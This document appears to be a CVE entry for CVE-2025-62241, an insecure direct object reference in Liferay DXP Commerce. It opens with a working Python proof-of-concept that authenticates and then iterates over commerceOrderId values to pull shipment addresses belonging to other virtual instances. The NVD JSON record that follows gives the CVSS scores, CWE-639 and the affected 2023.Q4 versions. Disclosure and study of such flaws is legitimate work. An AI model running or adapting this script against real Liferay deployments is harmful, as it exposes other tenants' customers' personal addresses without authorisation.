CVE-2025-62241

# CVE-2025-62241 PoC - Liferay DXP Commerce Order IDOR # Exploits missing virtual instance validation in CommerceOrderPortlet import requests TARGET_HOST = "https://target-liferay-instance.com" AUTH_USER = "attacker_user" AUTH_PASS = "attacker_password" # Step 1: Authenticate to obtain session cookie session = requests.Session() login_url = f"{TARGET_HOST}/c/portal/login" login_payload = { "_com_liferay_login_web_portlet_LoginPortlet_formDate": "", "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false", "_com_liferay_login_web_portlet_LoginPortlet_redirect": "", "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false", "_com_liferay_login_web_portlet_LoginPortlet_login": AUTH_USER, "_com_liferay_login_web_portlet_LoginPortlet_password": AUTH_PASS } session.post(login_url, data=login_payload) # Step 2: Exploit IDOR by manipulating commerceOrderId parameter # The vulnerable parameter allows accessing shipment addresses # from a different virtual instance vuln_endpoint = f"{TARGET_HOST}/group/guest/~/control_panel/manage?p_p_id=com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet" # Enumerate order IDs from other virtual instances for order_id in range(1, 100): params = { "p_p_lifecycle": "0", "_com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_commerceOrderId": str(order_id), "_com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_mvcRenderCommandName": "/commerce_order/view_commerce_order", } response = session.get(vuln_endpoint, params=params) if response.status_code == 200 and "shipment" in response.text.lower(): print(f"[+] Order ID {order_id} - Shipment address found:") # Extract address information from response print(response.text) break # Note: Successful exploitation returns shipment addresses # belonging to a different virtual instance than the attacker's

{"cve": {"id": "CVE-2025-62241", "sourceIdentifier": "[email protected]", "published": "2025-10-13T20:15:34.107", "lastModified": "2025-11-12T16:22:40.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure Direct Object Reference (IDOR) vulnerability with shipment addresses in Liferay DXP 2023.Q4.1 through 2023.Q4.5 allows remote authenticated users to from one virtual instance to view the shipment addresses of different virtual instance via the _com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_commerceOrderId parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A27A8480-7EE1-4265-9117-D6C234ACAC5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.2:*:*:*:*:*:*:*", "matchCriteriaId": "94425688-725E-41DC-B2D3-14F2A7163AD6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.3:*:*:*:*:*:*:*", "matchCriteriaId": "623CA096-BDBB-4F59-B734-07FB405800CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.4:*:*:*:*:*:*:*", "matchCriteriaId": "30B27CBE-14BA-4EBB-8B74-91DD1228A1F5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.5:*:*:*:*:*:*:*", "matchCriteriaId": "81EDBB1C-9EBB-4FAD-ADAC-B5A890BB3F50"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62241", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}